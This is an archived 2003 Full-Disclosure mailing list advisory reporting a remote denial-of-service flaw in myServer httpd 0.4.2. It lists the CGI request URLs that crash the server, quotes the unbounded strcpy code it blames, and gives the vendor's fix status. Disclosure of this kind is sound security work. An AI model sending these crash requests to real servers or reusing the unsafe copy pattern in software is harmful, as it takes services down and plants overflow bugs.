[Full-Disclosure] myServer - Remote Denial of Service

From: morning_wood (se_cur_ityat_private)
Date: Sun Jul 06 2003 - 09:37:35 PDT

Next message: morning_wood: "myServer - Remote Denial of Service"

Previous message: Probe Networks: "Strange DoS / new halflife server bug?"
Next in thread: morning_wood: "[Full-Disclosure] myServer - Remote Denial of Service"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------------------
          - EXPL-A-2003-012 exploitlabs.com Advisory 012
------------------------------------------------------------------
                         -= myServer =-



Donnie Werner
July 5, 2003


Vunerability(s):
----------------
Denial of Service


Product:
--------
myServer httpd  -  4.2 ( current )
http://myserverweb.sourceforge.net
http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerWIN32EXEC-0.4.2.zip
http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerSRC-0.4.2.zip

Description of product:
-----------------------
"It is a web server that allow everybody to have his own
 web server for free. It is easy to configure and manage,
 it is available for linux and windows.
It supports the CGI, ISAPI, WinCGI and FastCGI. Visit the homepage for
more info."

note:
http://www.securitytracker.com/alerts/2003/Jun/1006999.html
has NOT been fixed as of ver 4.2

http://www.security-protocols.com/print.php?sid=1534
appears fixed or not an issue in 4.2 under win


VUNERABILITY / EXPLOIT
======================

tested on Windows XP / 2k

issuing...

 http://[host]/cgi-bin/math_sum.mscgi?a=
 http://[host]/cgi-bin/math_sum.mscgi??=


completly crashes the httpd on the remote host

proally cuz..

------------ snip ------------

strcpy(a,cm.GetParam("a"));
strcpy(b,cm.GetParam("b"));

sprintf(c,"%i",atoi(a)+atoi(b));

------------ snip ------------


also..
http://[host]/cgi-bin/post.mscgi???
crashes server

Local:
------
no

Remote:
-------
yes


Vendor Fix:
-----------
No fix on 0day
Vendor has responded and claims the fix is in the CVS,
and will be resolved as of the upcomming 4.3 release.


Vendor Contact:
---------------
Concurrent with this advisory
http://sourceforge.net/tracker/?func=add&group_id=63119&atid=502904


Credits:
--------
Donnie Werner
morning_woodat_private
http://exploitlabs.com

thank you "nutcase" for confirmation testing
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: morning_wood: "myServer - Remote Denial of Service"
Previous message: Probe Networks: "Strange DoS / new halflife server bug?"
Next in thread: morning_wood: "[Full-Disclosure] myServer - Remote Denial of Service"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 07 2003 - 13:39:21 PDT